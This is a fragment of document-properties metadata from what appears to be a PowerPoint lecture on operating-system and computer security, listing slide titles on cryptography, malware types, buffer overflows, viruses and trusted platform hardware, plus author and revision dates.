      <vt:lpstr>Secret-Key Cryptography</vt:lpstr>
      <vt:lpstr>Modern encryption algorithms</vt:lpstr>
      <vt:lpstr>Key Distribution</vt:lpstr>
      <vt:lpstr>Public-Key Cryptography</vt:lpstr>
      <vt:lpstr>Public-Key Cryptography details</vt:lpstr>
      <vt:lpstr>Cryptographic Hash Function</vt:lpstr>
      <vt:lpstr>Digital Signatures</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Attacks on computer systems</vt:lpstr>
      <vt:lpstr>Operating System Security Trojan Horses</vt:lpstr>
      <vt:lpstr>Logic Bombs</vt:lpstr>
      <vt:lpstr>Trap Doors</vt:lpstr>
      <vt:lpstr>Login Spoofing</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>A buggy procedure</vt:lpstr>
      <vt:lpstr>Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Integer Overflow Attack</vt:lpstr>
      <vt:lpstr>Code Injection Attack</vt:lpstr>
      <vt:lpstr>Tenex Password Checking</vt:lpstr>
      <vt:lpstr>Defeating Password Checking</vt:lpstr>
      <vt:lpstr>The TENEX – password problem</vt:lpstr>
      <vt:lpstr>Design Principles for Security</vt:lpstr>
      <vt:lpstr>Security Problems</vt:lpstr>
      <vt:lpstr>Virus Damage Scenarios</vt:lpstr>
      <vt:lpstr>How Viruses Work (1)</vt:lpstr>
      <vt:lpstr>How viruses find executable files</vt:lpstr>
      <vt:lpstr>How Viruses Work (3)</vt:lpstr>
      <vt:lpstr>How Viruses Spread</vt:lpstr>
      <vt:lpstr>Hiding a virus in a file</vt:lpstr>
      <vt:lpstr>Using encryption to hide a virus</vt:lpstr>
      <vt:lpstr>Polymorphic Viruses</vt:lpstr>
      <vt:lpstr>Antivirus and Anti-Antivirus Techniques</vt:lpstr>
      <vt:lpstr>Worms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Two Types of Platforms</vt:lpstr>
      <vt:lpstr>Trusted Platform</vt:lpstr>
      <vt:lpstr>OS for trusted platforms</vt:lpstr>
      <vt:lpstr>Applications</vt:lpstr>
      <vt:lpstr>HW Mechanisms</vt:lpstr>
      <vt:lpstr>TPCA</vt:lpstr>
      <vt:lpstr>Trusted Platform Module</vt:lpstr>
      <vt:lpstr>TPM Components</vt:lpstr>
      <vt:lpstr>TPM SW Stack (TSS)</vt:lpstr>
      <vt:lpstr>Microsoft* CAPI TPM Crypto Service Provider (CSP)</vt:lpstr>
      <vt:lpstr>Usage Models</vt:lpstr>
      <vt:lpstr>Secure bootstrap</vt:lpstr>
      <vt:lpstr>Extend the PCR</vt:lpstr>
      <vt:lpstr>Integrity Measurement</vt:lpstr>
      <vt:lpstr>Hardware Protected Storage</vt:lpstr>
      <vt:lpstr>Encrypting Large Pieces of Data</vt:lpstr>
      <vt:lpstr>Binding Data to the Platform</vt:lpstr>
      <vt:lpstr>Attestation</vt:lpstr>
      <vt:lpstr>Attestation (Platform Authentication)</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Example Application (Microsoft Outlook)</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>ARM TrustZone</vt:lpstr>
      <vt:lpstr>ARM TrustZone</vt:lpstr>
      <vt:lpstr>Software Viewpoint</vt:lpstr>
      <vt:lpstr>System Example</vt:lpstr>
      <vt:lpstr>Deployment Scenarios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 Caches</dc:title>
  <dc:creator>sam</dc:creator>
  <cp:lastModifiedBy>sam</cp:lastModifiedBy>
  <cp:revision>79</cp:revision>
  <cp:lastPrinted>2011-02-23T00:18:43Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-05-08T02:05:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-12-19T09:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>